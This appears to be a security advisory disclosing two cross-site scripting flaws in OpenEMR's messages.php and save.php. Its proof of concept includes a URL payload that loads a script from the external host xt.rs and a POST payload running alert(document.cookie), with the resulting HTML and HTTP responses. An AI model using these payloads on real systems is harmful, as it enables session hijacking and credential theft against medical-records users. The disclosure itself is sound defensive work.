Description

The first occurrence affects messages.php file. The parameter stage was not properly encoded before being printed as HTML. This occurs when go parameter is set to setup value.

The second instance affects save.php file. There was a POST parameter called parameter in JSON format that was being printed as-is in a JSON response but using an HTML content-type header.

Proof of Concept

The first instance can be exploited by accesing http://openemr.vuln/interface/main/messages/messages.php?go=setup&stage=%3Cscript%20src=//xt.rs%3E%3C/script%3E.

The following HTML code will be generated:

369: <title>MedEx Setup</title><br /><span class='title'><script src=//xt.rs></script> Warning: This is not a valid request.</span></body>

The second instance can be exploited by sending the following request:

POST /openemr/interface/main/messages/save.php?action=process HTTP/1.1
Host: xxxxxxx
(...snip..)

parameter={"xss":"<img%20src=x%20onerror=alert(document.cookie)>"}

That generated this response:

HTTP/1.1 200 OK
(...snip...)
Content-Type: text/html; charset=utf-8

{"xss":"<img src=x onerror=alert(document.cookie)>"}

As it was being interpreted as HTML content, the payload will be executed.

Impact

This vulnerability allows a remote attacker gain control on the victims browser when a malicious link is clicked. The attacker could be able to steal the session cookie, trick the user to enter their credentials or, in general, take control on the web application flow.